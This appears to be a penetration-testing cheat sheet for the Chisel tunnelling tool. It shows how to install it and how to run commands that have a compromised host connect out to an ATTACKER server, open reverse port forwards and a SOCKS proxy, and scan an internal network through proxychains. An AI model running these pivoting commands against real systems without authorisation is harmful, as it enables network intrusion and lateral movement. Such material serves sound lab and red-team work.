Description
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. It is useful for pivoting through firewalls or reaching internal services via a compromised host. Single binary, no dependencies.
Installation
BASH
# Download binary
curl -sL https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz | gunzip > chisel
chmod +x chisel
# Go install
go install github.com/jpillora/chisel@latestBasic Usage
BASH
# Server (attacker)
./chisel server --reverse -p 8000
# Client - reverse port forward (target)
./chisel client ATTACKER:8000 R:8080:127.0.0.1:80
# Forwards attacker:8080 → target:80
# Local port forward
./chisel client ATTACKER:8000 9090:10.10.10.5:80
# Forwards target:9090 → 10.10.10.5:80Advanced Usage
BASH
# SOCKS proxy (full network pivot)
# Server
./chisel server --reverse -p 8000
# Client
./chisel client ATTACKER:8000 R:1080:socks
# Use with proxychains: socks5 127.0.0.1 1080
# Multiple forwards
./chisel client ATTACKER:8000 R:8080:10.10.10.5:80 R:3389:10.10.10.5:3389
# UDP forwarding
./chisel client ATTACKER:8000 R:53:10.10.10.1:53/udp
# Authenticated
./chisel server --reverse -p 8000 --auth user:password
./chisel client --auth user:password ATTACKER:8000 R:1080:socksCommon Workflows
BASH
# Pivot to internal network
# Attacker: ./chisel server --reverse -p 8000
# Target: ./chisel client ATTACKER:8000 R:1080:socks
# Attacker: proxychains nmap -sT 10.10.10.0/24